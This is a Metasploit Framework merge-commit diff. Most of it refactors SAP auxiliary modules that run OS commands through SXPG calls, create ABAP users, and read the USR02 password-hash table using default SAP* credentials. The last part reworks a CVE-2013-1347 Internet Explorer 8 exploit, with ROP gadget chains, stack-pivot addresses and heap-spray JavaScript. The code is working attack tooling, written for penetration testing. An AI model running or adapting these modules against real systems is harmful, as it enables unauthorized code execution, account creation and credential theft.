Merge branch 'master' of https://github.com/rapid7/metasploit-framework
commit
866fa167ab
|
@ -15,7 +15,7 @@ class Metasploit4 < Msf::Auxiliary
|
|||
|
||||
def initialize
|
||||
super(
|
||||
'Name' => 'SAP Management Console ABAP syslog',
|
||||
'Name' => 'SAP Management Console ABAP Syslog Disclosure',
|
||||
'Description' => %q{ This module simply attempts to extract the ABAP syslog through the SAP Management Console SOAP Interface. },
|
||||
'References' =>
|
||||
[
|
||||
|
@ -106,7 +106,7 @@ class Metasploit4 < Msf::Auxiliary
|
|||
if success
|
||||
print_status("#{rhost}:#{rport} [SAP] ABAP syslog downloading")
|
||||
print_status("#{rhost}:#{rport} [SAP] Storing looted SAP ABAP syslog XML file")
|
||||
store_loot(
|
||||
path = store_loot(
|
||||
"sap.abap.syslog",
|
||||
"text/xml",
|
||||
rhost,
|
||||
|
@ -114,7 +114,7 @@ class Metasploit4 < Msf::Auxiliary
|
|||
"sap_abap_syslog.xml",
|
||||
"SAP ABAP syslog"
|
||||
)
|
||||
|
||||
print_good("#{rhost}:#{rport} [SAP] SAP ABAP syslog XML file stored at #{path}")
|
||||
elsif fault
|
||||
print_error("#{rhost}:#{rport} [SAP] Error code: #{faultcode}")
|
||||
return
|
||||
|
|
|
@ -70,21 +70,20 @@ class Metasploit4 < Msf::Auxiliary
|
|||
data << '</n1:BAPI_USER_CREATE1>'
|
||||
data << '</env:Body>'
|
||||
data << '</env:Envelope>'
|
||||
user_pass = Rex::Text.encode_base64(datastore['USERNAME'] + ":" + datastore['PASSWORD'])
|
||||
begin
|
||||
print_status("[SAP] #{ip}:#{rport} - Attempting to create user '#{datastore['BAPI_USER']}' with password '#{datastore['BAPI_PASSWORD']}'")
|
||||
res = send_request_raw({
|
||||
res = send_request_cgi({
|
||||
'uri' => '/sap/bc/soap/rfc?sap-client=' + datastore['CLIENT'] + '&sap-language=EN',
|
||||
'method' => 'POST',
|
||||
'data' => data,
|
||||
'headers' =>{
|
||||
'Content-Length' => data.size.to_s,
|
||||
'cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + datastore['CLIENT'],
|
||||
'ctype' => 'text/xml; charset=UTF-8',
|
||||
'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']),
|
||||
'headers' =>
|
||||
{
|
||||
'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions',
|
||||
'Cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + datastore['CLIENT'],
|
||||
'Authorization' => 'Basic ' + user_pass,
|
||||
'Content-Type' => 'text/xml; charset=UTF-8'
|
||||
}
|
||||
}, 45)
|
||||
})
|
||||
if res and res.code == 200
|
||||
if res.body =~ /<h1>Logon failed<\/h1>/
|
||||
print_error("[SAP] #{ip}:#{rport} - Logon failed")
|
||||
|
|
|
@ -118,19 +118,19 @@ class Metasploit4 < Msf::Auxiliary
|
|||
data << '</n1:RFC_PING>'
|
||||
data << '</env:Body>'
|
||||
data << '</env:Envelope>'
|
||||
user_pass = Rex::Text.encode_base64(username+ ":" + password)
|
||||
begin
|
||||
res = send_request_raw({
|
||||
res = send_request_cgi({
|
||||
'uri' => '/sap/bc/soap/rfc?sap-client=' + client + '&sap-language=EN',
|
||||
'method' => 'POST',
|
||||
'data' => data,
|
||||
'headers' =>{
|
||||
'Content-Length' => data.size.to_s,
|
||||
'cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + client,
|
||||
'ctype' => 'text/xml; charset=UTF-8',
|
||||
'authorization' => basic_auth(username, password),
|
||||
'headers' =>
|
||||
{
|
||||
'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions',
|
||||
'Cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + client,
|
||||
'Authorization' => 'Basic ' + user_pass,
|
||||
'Content-Type' => 'text/xml; charset=UTF-8'}
|
||||
}, 45)
|
||||
}
|
||||
})
|
||||
if res and res.code == 200
|
||||
report_auth_info(
|
||||
:host => rhost,
|
||||
|
|
|
@ -73,7 +73,7 @@ class Metasploit4 < Msf::Auxiliary
|
|||
if num == 1
|
||||
command = '-o c:\\\pwn.out -n pwnsap' + "\r\n!"
|
||||
space = "%programfiles:~10,1%"
|
||||
command << datastore['COMMAND'].gsub(" ",space)
|
||||
command << datastore['CMD'].gsub(" ",space)
|
||||
end
|
||||
command = '-ic c:\\\pwn.out' if num == 2
|
||||
end
|
||||
|
@ -92,22 +92,19 @@ class Metasploit4 < Msf::Auxiliary
|
|||
end
|
||||
|
||||
def exec_command(ip,data)
|
||||
user_pass = Rex::Text.encode_base64(datastore['USERNAME'] + ":" + datastore['PASSWORD'])
|
||||
print_status("[SAP] #{ip}:#{rport} - sending SOAP SXPG_CALL_SYSTEM request")
|
||||
begin
|
||||
res = send_request_raw(
|
||||
{
|
||||
res = send_request_cgi({
|
||||
'uri' => '/sap/bc/soap/rfc?sap-client=' + datastore['CLIENT'] + '&sap-language=EN',
|
||||
'method' => 'POST',
|
||||
'data' => data,
|
||||
'headers' => {
|
||||
'Content-Length' => data.size.to_s,
|
||||
'cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + datastore['CLIENT'],
|
||||
'ctype' => 'text/xml; charset=UTF-8',
|
||||
'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']),
|
||||
'headers' =>{
|
||||
'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions',
|
||||
'Cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + datastore['CLIENT'],
|
||||
'Authorization' => 'Basic ' + user_pass,
|
||||
'Content-Type' => 'text/xml; charset=UTF-8'
|
||||
}
|
||||
}, 45)
|
||||
})
|
||||
if res and res.code != 500 and res.code != 200
|
||||
print_error("[SAP] #{ip}:#{rport} - something went wrong!")
|
||||
return
|
||||
|
|
|
@ -74,7 +74,7 @@ class Metasploit4 < Msf::Auxiliary
|
|||
if num == 1
|
||||
command = '-o c:\\\pwn.out -n pwnsap' + "\r\n!"
|
||||
space = "%programfiles:~10,1%"
|
||||
command << datastore['COMMAND'].gsub(" ",space)
|
||||
command << datastore['CMD'].gsub(" ",space)
|
||||
end
|
||||
command = '-ic c:\\\pwn.out' if num == 2
|
||||
end
|
||||
|
@ -93,22 +93,19 @@ class Metasploit4 < Msf::Auxiliary
|
|||
end
|
||||
|
||||
def exec_command(ip,data)
|
||||
user_pass = Rex::Text.encode_base64(datastore['USERNAME'] + ":" + datastore['PASSWORD'])
|
||||
print_status("[SAP] #{ip}:#{rport} - sending SOAP SXPG_COMMAND_EXECUTE request")
|
||||
begin
|
||||
res = send_request_raw(
|
||||
{
|
||||
res = send_request_cgi({
|
||||
'uri' => '/sap/bc/soap/rfc?sap-client=' + datastore['CLIENT'] + '&sap-language=EN',
|
||||
'method' => 'POST',
|
||||
'data' => data,
|
||||
'headers' => {
|
||||
'Content-Length' => data.size.to_s,
|
||||
'cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + datastore['CLIENT'],
|
||||
'ctype' => 'text/xml; charset=UTF-8',
|
||||
'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']),
|
||||
'headers' =>{
|
||||
'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions',
|
||||
'Cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + datastore['CLIENT'],
|
||||
'Authorization' => 'Basic ' + user_pass,
|
||||
'Content-Type' => 'text/xml; charset=UTF-8'
|
||||
}
|
||||
}, 45)
|
||||
})
|
||||
if res
|
||||
if res.code != 500 and res.code != 200
|
||||
print_error("[SAP] #{ip}:#{rport} - something went wrong!")
|
||||
|
|
|
@ -61,22 +61,20 @@ class Metasploit4 < Msf::Auxiliary
|
|||
data << '</n1:RFC_PING>'
|
||||
data << '</env:Body>'
|
||||
data << '</env:Envelope>'
|
||||
user_pass = Rex::Text.encode_base64(datastore['USERNAME'] + ":" + datastore['PASSWORD'])
|
||||
print_status("[SAP] #{ip}:#{rport} - sending SOAP RFC_PING request")
|
||||
begin
|
||||
res = send_request_raw({
|
||||
res = send_request_cgi({
|
||||
'uri' => '/sap/bc/soap/rfc?sap-client=' + client + '&sap-language=EN',
|
||||
'method' => 'POST',
|
||||
'cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + client,
|
||||
'data' => data,
|
||||
'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']),
|
||||
'ctype' => 'text/xml; charset=UTF-8',
|
||||
'headers' =>
|
||||
{
|
||||
'Content-Length' => data.size.to_s,
|
||||
'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions',
|
||||
'Cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + client,
|
||||
'Authorization' => 'Basic ' + user_pass,
|
||||
'Content-Type' => 'text/xml; charset=UTF-8'
|
||||
'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions'
|
||||
}
|
||||
}, 45)
|
||||
})
|
||||
if res and res.code != 500 and res.code != 200
|
||||
if res and res.body =~ /<h1>Logon failed<\/h1>/
|
||||
print_error("[SAP] #{ip}:#{rport} - login failed!")
|
||||
|
|
|
@ -49,8 +49,8 @@ class Metasploit4 < Msf::Auxiliary
|
|||
OptString.new('CLIENT', [true, 'SAP client', '001']),
|
||||
OptString.new('USERNAME', [true, 'Username', 'SAP*']),
|
||||
OptString.new('PASSWORD', [true, 'Password', '06071992']),
|
||||
OptString.new('TABLE', [true, 'Table to read', nil]),
|
||||
OptString.new('FIELDS', [true, 'Fields to read', '*'])
|
||||
OptString.new('TABLE', [true, 'Table to read', 'USR02']),
|
||||
OptString.new('FIELDS', [true, 'Fields to read', 'BNAME,BCODE'])
|
||||
], self.class)
|
||||
end
|
||||
|
||||
|
@ -82,21 +82,22 @@ class Metasploit4 < Msf::Auxiliary
|
|||
data << '</n1:RFC_READ_TABLE>'
|
||||
data << '</env:Body>'
|
||||
data << '</env:Envelope>'
|
||||
user_pass = Rex::Text.encode_base64(datastore['USERNAME'] + ":" + datastore['PASSWORD'])
|
||||
print_status("[SAP] #{ip}:#{rport} - sending SOAP RFC_READ_TABLE request")
|
||||
begin
|
||||
res = send_request_raw({
|
||||
res = send_request_cgi({
|
||||
'uri' => '/sap/bc/soap/rfc?sap-client=' + datastore['CLIENT'] + '&sap-language=EN',
|
||||
'method' => 'POST',
|
||||
'data' => data,
|
||||
'cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + datastore['CLIENT'],
|
||||
'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']),
|
||||
'ctype' => 'text/xml; charset=UTF-8',
|
||||
'headers' =>{
|
||||
'Content-Length' => data.size.to_s,
|
||||
'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions',
|
||||
'Cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + datastore['CLIENT'],
|
||||
'Authorization' => 'Basic ' + user_pass,
|
||||
'Content-Type' => 'text/xml; charset=UTF-8'
|
||||
#'Cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + datastore['CLIENT'],
|
||||
#'Authorization' => 'Basic ' + user_pass,
|
||||
#'Content-Type' =>
|
||||
}
|
||||
}, 45)
|
||||
})
|
||||
if res and res.code != 500 and res.code != 200
|
||||
# to do - implement error handlers for each status code, 404, 301, etc.
|
||||
if res.body =~ /<h1>Logon failed<\/h1>/
|
||||
|
|
|
@ -68,42 +68,46 @@ class Metasploit4 < Msf::Auxiliary
|
|||
data << '</n1:SUSR_RFC_USER_INTERFACE>'
|
||||
data << '</env:Body>'
|
||||
data << '</env:Envelope>'
|
||||
user_pass = Rex::Text.encode_base64(datastore['USERNAME'] + ":" + datastore['PASSWORD'])
|
||||
|
||||
begin
|
||||
print_status("[SAP] #{ip}:#{rport} - Attempting to create user '#{datastore['ABAP_USER']}' with password '#{datastore['ABAP_PASSWORD']}'")
|
||||
res = send_request_raw({
|
||||
vprint_status("[SAP] #{ip}:#{rport} - Attempting to create user '#{datastore['ABAP_USER']}' with password '#{datastore['ABAP_PASSWORD']}'")
|
||||
res = send_request_cgi({
|
||||
'uri' => '/sap/bc/soap/rfc?sap-client=' + datastore['CLIENT'] + '&sap-language=EN',
|
||||
'method' => 'POST',
|
||||
'data' => data,
|
||||
'headers' =>{
|
||||
'Content-Length' => data.size.to_s,
|
||||
'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions',
|
||||
'Cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + datastore['CLIENT'],
|
||||
'Authorization' => 'Basic ' + user_pass,
|
||||
'Content-Type' => 'text/xml; charset=UTF-8'}
|
||||
}, 45)
|
||||
'cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + datastore['CLIENT'],
|
||||
'ctype' => 'text/xml; charset=UTF-8',
|
||||
'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']),
|
||||
'headers' =>
|
||||
{
|
||||
'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions'
|
||||
}
|
||||
})
|
||||
if res and res.code == 200
|
||||
if res.body =~ /<h1>Logon failed<\/h1>/
|
||||
print_error("[SAP] #{ip}:#{rport} - Logon failed")
|
||||
vprint_error("[SAP] #{ip}:#{rport} - Logon failed")
|
||||
return
|
||||
elsif res.body =~ /faultstring/
|
||||
error = []
|
||||
error = [ res.body.scan(%r{(.*?)}) ]
|
||||
print_error("[SAP] #{ip}:#{rport} - #{error.join.chomp}")
|
||||
vprint_error("[SAP] #{ip}:#{rport} - #{error.join.chomp}")
|
||||
return
|
||||
else
|
||||
print_good("[SAP] #{ip}:#{rport} - User '#{datastore['ABAP_USER']}' with password '#{datastore['ABAP_PASSWORD']}' created")
|
||||
return
|
||||
end
|
||||
elsif res and res.code == 500 and res.body =~ /USER_ALLREADY_EXISTS/
|
||||
vprint_error("[SAP] #{ip}:#{rport} - user already exists")
|
||||
return
|
||||
else
|
||||
print_error("[SAP] #{ip}:#{rport} - Unknown error")
|
||||
print_error("[SAP] #{ip}:#{rport} - Error code: " + res.code) if res
|
||||
print_error("[SAP] #{ip}:#{rport} - Error message: " + res.message) if res
|
||||
vprint_error("[SAP] #{ip}:#{rport} - Unknown error")
|
||||
vprint_error("[SAP] #{ip}:#{rport} - Error code: " + res.code) if res
|
||||
vprint_error("[SAP] #{ip}:#{rport} - Error message: " + res.message) if res
|
||||
return
|
||||
end
|
||||
rescue ::Rex::ConnectionError
|
||||
print_error("[SAP] #{rhost}:#{rport} - Unable to connect")
|
||||
vprint_error("[SAP] #{rhost}:#{rport} - Unable to connect")
|
||||
return
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
|
|
|
@ -49,7 +49,7 @@ class Metasploit4 < Msf::Auxiliary
|
|||
OptString.new('CLIENT', [true, 'SAP Client', '001']),
|
||||
OptString.new('USERNAME', [true, 'Username', 'SAP*']),
|
||||
OptString.new('PASSWORD', [true, 'Password', '06071992']),
|
||||
OptString.new('CMD', [true, 'SM69 command to be executed', nil]),
|
||||
OptString.new('CMD', [true, 'SM69 command to be executed', 'PING']),
|
||||
OptString.new('PARAM', [false, 'Additional parameters for the SM69 command', nil]),
|
||||
OptEnum.new('OS', [true, 'SM69 Target OS','ANYOS',['ANYOS', 'UNIX', 'Windows NT', 'AS/400', 'OS/400']])
|
||||
], self.class)
|
||||
|
@ -72,21 +72,19 @@ class Metasploit4 < Msf::Auxiliary
|
|||
data << '</n1:SXPG_CALL_SYSTEM>'
|
||||
data << '</env:Body>'
|
||||
data << '</env:Envelope>'
|
||||
user_pass = Rex::Text.encode_base64(datastore['USERNAME'] + ":" + datastore['PASSWORD'])
|
||||
print_status("[SAP] #{ip}:#{rport} - sending SOAP SXPG_COMMAND_EXECUTE request")
|
||||
begin
|
||||
res = send_request_raw({
|
||||
res = send_request_cgi({
|
||||
'uri' => '/sap/bc/soap/rfc?sap-client=' + datastore['CLIENT'] + '&sap-language=EN',
|
||||
'method' => 'POST',
|
||||
'data' => data,
|
||||
'cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + datastore['CLIENT'],
|
||||
'ctype' => 'text/xml; charset=UTF-8',
|
||||
'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']),
|
||||
'headers' =>{
|
||||
'Content-Length' => data.size.to_s,
|
||||
'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions',
|
||||
'Cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + datastore['CLIENT'],
|
||||
'Authorization' => 'Basic ' + user_pass,
|
||||
'Content-Type' => 'text/xml; charset=UTF-8'
|
||||
}
|
||||
}, 45)
|
||||
})
|
||||
if res and res.code != 500 and res.code != 200
|
||||
# to do - implement error handlers for each status code, 404, 301, etc.
|
||||
print_error("[SAP] #{ip}:#{rport} - something went wrong!")
|
||||
|
|
|
@ -49,7 +49,7 @@ class Metasploit4 < Msf::Auxiliary
|
|||
OptString.new('CLIENT', [true, 'SAP Client', '001']),
|
||||
OptString.new('USERNAME', [true, 'Username', 'SAP*']),
|
||||
OptString.new('PASSWORD', [true, 'Password', '06071992']),
|
||||
OptString.new('CMD', [true, 'SM69 command to be executed', nil]),
|
||||
OptString.new('CMD', [true, 'SM69 command to be executed', 'PING']),
|
||||
OptString.new('PARAM', [false, 'Additional parameters for the SM69 command', nil]),
|
||||
OptEnum.new('OS', [true, 'SM69 Target OS','ANYOS',['ANYOS', 'UNIX', 'Windows NT', 'AS/400', 'OS/400']])
|
||||
], self.class)
|
||||
|
@ -72,21 +72,19 @@ class Metasploit4 < Msf::Auxiliary
|
|||
data << '</n1:SXPG_COMMAND_EXECUTE>'
|
||||
data << '</env:Body>'
|
||||
data << '</env:Envelope>'
|
||||
user_pass = Rex::Text.encode_base64(datastore['USERNAME'] + ":" + datastore['PASSWORD'])
|
||||
print_status("[SAP] #{ip}:#{rport} - sending SOAP SXPG_COMMAND_EXECUTE request")
|
||||
begin
|
||||
res = send_request_raw({
|
||||
res = send_request_cgi({
|
||||
'uri' => '/sap/bc/soap/rfc?sap-client=' + datastore['CLIENT'] + '&sap-language=EN',
|
||||
'method' => 'POST',
|
||||
'data' => data,
|
||||
'cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + datastore['CLIENT'],
|
||||
'ctype' => 'text/xml; charset=UTF-8',
|
||||
'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']),
|
||||
'headers' =>{
|
||||
'Content-Length' => data.size.to_s,
|
||||
'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions',
|
||||
'Cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + datastore['CLIENT'],
|
||||
'Authorization' => 'Basic ' + user_pass,
|
||||
'Content-Type' => 'text/xml; charset=UTF-8'
|
||||
}
|
||||
}, 45)
|
||||
})
|
||||
if res and res.code != 500 and res.code != 200
|
||||
# to do - implement error handlers for each status code, 404, 301, etc.
|
||||
print_error("[SAP] #{ip}:#{rport} - something went wrong!")
|
||||
|
|
|
@ -88,22 +88,19 @@ class Metasploit4 < Msf::Auxiliary
|
|||
data << '</n1:RFC_SYSTEM_INFO>'
|
||||
data << '</env:Body>'
|
||||
data << '</env:Envelope>'
|
||||
user_pass = Rex::Text.encode_base64(datastore['USERNAME'] + ":" + datastore['PASSWORD'])
|
||||
print_status("[SAP] #{ip}:#{rport} - sending SOAP RFC_SYSTEM_INFO request")
|
||||
begin
|
||||
res = send_request_raw({
|
||||
'uri' => '/sap/bc/soap/rfc?sap-client=' + client + '&sap-language=EN',
|
||||
res = send_request_cgi({
|
||||
'uri' => '/sap/bc/soap/rfc?sap-client=' + datastore['CLIENT'] + '&sap-language=EN',
|
||||
'method' => 'POST',
|
||||
'data' => data,
|
||||
'headers' =>
|
||||
{
|
||||
'Content-Length' => data.size.to_s,
|
||||
'cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + datastore['CLIENT'],
|
||||
'ctype' => 'text/xml; charset=UTF-8',
|
||||
'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']),
|
||||
'headers' =>{
|
||||
'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions',
|
||||
'Cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + client,
|
||||
'Authorization' => 'Basic ' + user_pass,
|
||||
'Content-Type' => 'text/xml; charset=UTF-8'
|
||||
}
|
||||
}, 45)
|
||||
})
|
||||
if res and res.code != 500 and res.code != 200
|
||||
# to do - implement error handlers for each status code, 404, 301, etc.
|
||||
print_error("[SAP] #{ip}:#{rport} - something went wrong!")
|
||||
|
|
|
@ -62,23 +62,20 @@ class Metasploit4 < Msf::Auxiliary
|
|||
data << '</env:Body>'
|
||||
data << '</env:Envelope>'
|
||||
|
||||
user_pass = Rex::Text.encode_base64(datastore['USERNAME'] + ":" + datastore['PASSWORD'])
|
||||
|
||||
print_status("[SAP] #{ip}:#{rport} - sending SOAP TH_SAPREL request")
|
||||
|
||||
begin
|
||||
res = send_request_raw({
|
||||
res = send_request_cgi({
|
||||
'uri' => '/sap/bc/soap/rfc?sap-client=' + datastore['CLIENT'] + '&sap-language=EN',
|
||||
'method' => 'POST',
|
||||
'data' => data,
|
||||
'cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + datastore['CLIENT'],
|
||||
'ctype' => 'text/xml; charset=UTF-8',
|
||||
'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']),
|
||||
'headers' =>{
|
||||
'Content-Length' => data.size.to_s,
|
||||
'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions',
|
||||
'Cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + datastore['CLIENT'],
|
||||
'Authorization' => 'Basic ' + user_pass,
|
||||
'Content-Type' => 'text/xml; charset=UTF-8'
|
||||
}
|
||||
}, 45)
|
||||
})
|
||||
if res and res.code == 200
|
||||
kern_comp_on = $1 if res.body =~ /<KERN_COMP_ON>(.*)<\/KERN_COMP_ON>/i
|
||||
kern_comp_time = $1 if res.body =~ /<KERN_COMP_TIME>(.*)<\/KERN_COMP_TIME>/i
|
||||
|
|
|
@ -1,5 +1,4 @@
|
|||
##
|
||||
#
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
|
@ -48,6 +47,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
[
|
||||
[ 'CVE', '2013-1347' ],
|
||||
[ 'OSVDB', '92993' ],
|
||||
[ 'US-CERT-VU', '237655' ],
|
||||
[ 'URL', 'http://blogs.technet.com/b/msrc/archive/2013/05/03/microsoft-releases-security-advisory-2847140.aspx'],
|
||||
[ 'URL', 'http://r-7.co/IE8-DOL' ] # sinn3r's writeup
|
||||
],
|
||||
|
@ -82,7 +82,6 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
def get_target(agent)
|
||||
#If the user is already specified by the user, we'll just use that
|
||||
return target if target.name != 'Automatic'
|
||||
|
||||
nt = agent.scan(/Windows NT (\d\.\d)/).flatten[0] || ''
|
||||
|
@ -114,80 +113,16 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
return nil
|
||||
end
|
||||
|
||||
def ie8_smil(my_target, p)
|
||||
|
||||
case my_target['Rop']
|
||||
when :msvcrt
|
||||
case my_target.name
|
||||
when 'IE 8 on Windows XP SP3'
|
||||
align_esp = Rex::Text.to_unescape([0x77c4d801].pack("V*")) # ADD ESP, 2C; RET
|
||||
xchg_esp = Rex::Text.to_unescape([0x77c15ed5].pack("V*")) # XCHG EAX, ESP, RET
|
||||
when 'IE 8 on Windows Server 2003'
|
||||
align_esp = Rex::Text.to_unescape([0x77bde7f6].pack("V*"))
|
||||
xchg_esp = Rex::Text.to_unescape([0x77bcba5e].pack("V*"))
|
||||
end
|
||||
else
|
||||
align_esp = Rex::Text.to_unescape([0x7C3445F8].pack("V*"))
|
||||
xchg_esp = Rex::Text.to_unescape([0x7C348B05].pack("V*"))
|
||||
end
|
||||
|
||||
padding = Rex::Text.to_unescape(Rex::Text.rand_text_alpha(4))
|
||||
js_payload = Rex::Text.to_unescape(p)
|
||||
|
||||
js = %Q|
|
||||
unicorn = unescape("ABCD");
|
||||
unicorn2 = unescape("EEEE");
|
||||
for (i=0; i < 2; i++) {
|
||||
unicorn += unescape("ABCD");
|
||||
}unicorn += unescape("AB");
|
||||
|
||||
unicorn += unescape("#{js_payload}");
|
||||
|
||||
animvalues = unescape("#{align_esp}");
|
||||
|
||||
for (i=0; i < 0x70/4; i++) {
|
||||
if (i == 0x70/4-1) {
|
||||
animvalues += unescape("#{xchg_esp}");
|
||||
}
|
||||
else {
|
||||
animvalues += unescape("#{align_esp}");
|
||||
}
|
||||
}
|
||||
|
||||
animvalues += unicorn;
|
||||
|
||||
for(i = 0; i < 13; i++) {
|
||||
animvalues += ";red";
|
||||
}
|
||||
|
|
||||
|
||||
if datastore['OBFUSCATE']
|
||||
js = ::Rex::Exploitation::JSObfu.new(js)
|
||||
js.obfuscate
|
||||
end
|
||||
|
||||
return js
|
||||
end
|
||||
|
||||
def junk(n=4)
|
||||
return rand_text_alpha(n).unpack("V")[0].to_i
|
||||
end
|
||||
|
||||
def nop
|
||||
return make_nops(4).unpack("V")[0].to_i
|
||||
end
|
||||
|
||||
def get_payload(t, cli)
|
||||
code = payload.encoded
|
||||
|
||||
# No rop. Just return the payload.
|
||||
return code if t['Rop'].nil?
|
||||
rop_payload = ''
|
||||
|
||||
case t['Rop']
|
||||
when :msvcrt
|
||||
case t.name
|
||||
when 'IE 8 on Windows XP SP3'
|
||||
rop_gadgets =
|
||||
algin = "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500
|
||||
chain = ''
|
||||
|
||||
if t.name == 'IE 8 on Windows XP SP3'
|
||||
chain =
|
||||
[
|
||||
0x77c1e844, # POP EBP # RETN [msvcrt.dll]
|
||||
0x77c1e844, # skip 4 bytes [msvcrt.dll]
|
||||
|
@ -212,8 +147,12 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
0x77c12df9, # PUSHAD # RETN [msvcrt.dll]
|
||||
0x77c35459 # ptr to 'push esp # ret ' [msvcrt.dll]
|
||||
].pack("V*")
|
||||
when 'IE 8 on Windows Server 2003'
|
||||
rop_gadgets =
|
||||
|
||||
elsif t.name == 'IE 8 on Windows Server 2003'
|
||||
junk = rand_text_alpha(4).unpack("V")[0].to_i
|
||||
nop = make_nops(4).unpack("V")[0].to_i
|
||||
|
||||
chain =
|
||||
[
|
||||
0x77bb2563, # POP EAX # RETN
|
||||
0x77ba1114, # <- *&VirtualProtect()
|
||||
|
@ -241,48 +180,39 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
0x77be6591 # PUSHAD # ADD AL,0EF # RETN
|
||||
].pack("V*")
|
||||
end
|
||||
else
|
||||
rop_gadgets =
|
||||
[
|
||||
0x7c37653d, # POP EAX # POP EDI # POP ESI # POP EBX # POP EBP # RETN
|
||||
0xfffffdff, # Value to negate, will become 0x00000201 (dwSize)
|
||||
0x7c347f98, # RETN (ROP NOP) [msvcr71.dll]
|
||||
0x7c3415a2, # JMP [EAX] [msvcr71.dll]
|
||||
0xffffffff,
|
||||
0x7c376402, # skip 4 bytes [msvcr71.dll]
|
||||
0x7c351e05, # NEG EAX # RETN [msvcr71.dll]
|
||||
0x7c345255, # INC EBX # FPATAN # RETN [msvcr71.dll]
|
||||
0x7c352174, # ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN [msvcr71.dll]
|
||||
0x7c344f87, # POP EDX # RETN [msvcr71.dll]
|
||||
0xffffffc0, # Value to negate, will become 0x00000040
|
||||
0x7c351eb1, # NEG EDX # RETN [msvcr71.dll]
|
||||
0x7c34d201, # POP ECX # RETN [msvcr71.dll]
|
||||
0x7c38b001, # &Writable location [msvcr71.dll]
|
||||
0x7c347f97, # POP EAX # RETN [msvcr71.dll]
|
||||
0x7c37a151, # ptr to &VirtualProtect() - 0x0EF [IAT msvcr71.dll]
|
||||
0x7c378c81, # PUSHAD # ADD AL,0EF # RETN [msvcr71.dll]
|
||||
0x7c345c30 # ptr to 'push esp # ret ' [msvcr71.dll]
|
||||
# rop chain generated with mona.py
|
||||
].pack("V*")
|
||||
end
|
||||
|
||||
rop_payload = rop_gadgets
|
||||
case t['Rop']
|
||||
when :msvcrt
|
||||
rop_payload << "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500
|
||||
rop_payload = chain + algin + payload.encoded
|
||||
|
||||
else
|
||||
rop_payload << "\x81\xEC\xF0\xD8\xFF\xFF" # sub esp, -10000
|
||||
code = "\x81\xEC\xF0\xD8\xFF\xFF" # sub esp, -10000
|
||||
code << payload.encoded
|
||||
code << rand_text_alpha(12000)
|
||||
|
||||
rop_payload = generate_rop_payload('java', code)
|
||||
end
|
||||
rop_payload << code
|
||||
rop_payload << rand_text_alpha(12000) unless t['Rop'] == :msvcrt
|
||||
|
||||
return rop_payload
|
||||
end
|
||||
|
||||
def load_exploit_html(my_target, cli)
|
||||
case my_target['Rop']
|
||||
when :msvcrt
|
||||
case my_target.name
|
||||
when 'IE 8 on Windows XP SP3'
|
||||
align_esp = Rex::Text.to_unescape([0x77c4d801].pack("V*")) # ADD ESP, 2C; RET
|
||||
xchg_esp = Rex::Text.to_unescape([0x77c15ed5].pack("V*")) # XCHG EAX, ESP, RET
|
||||
when 'IE 8 on Windows Server 2003'
|
||||
align_esp = Rex::Text.to_unescape([0x77bde7f6].pack("V*"))
|
||||
xchg_esp = Rex::Text.to_unescape([0x77bcba5e].pack("V*"))
|
||||
end
|
||||
else
|
||||
align_esp = Rex::Text.to_unescape([0x7C3445F8].pack("V*"))
|
||||
xchg_esp = Rex::Text.to_unescape([0x7C348B05].pack("V*"))
|
||||
end
|
||||
|
||||
padding = Rex::Text.to_unescape(Rex::Text.rand_text_alpha(4))
|
||||
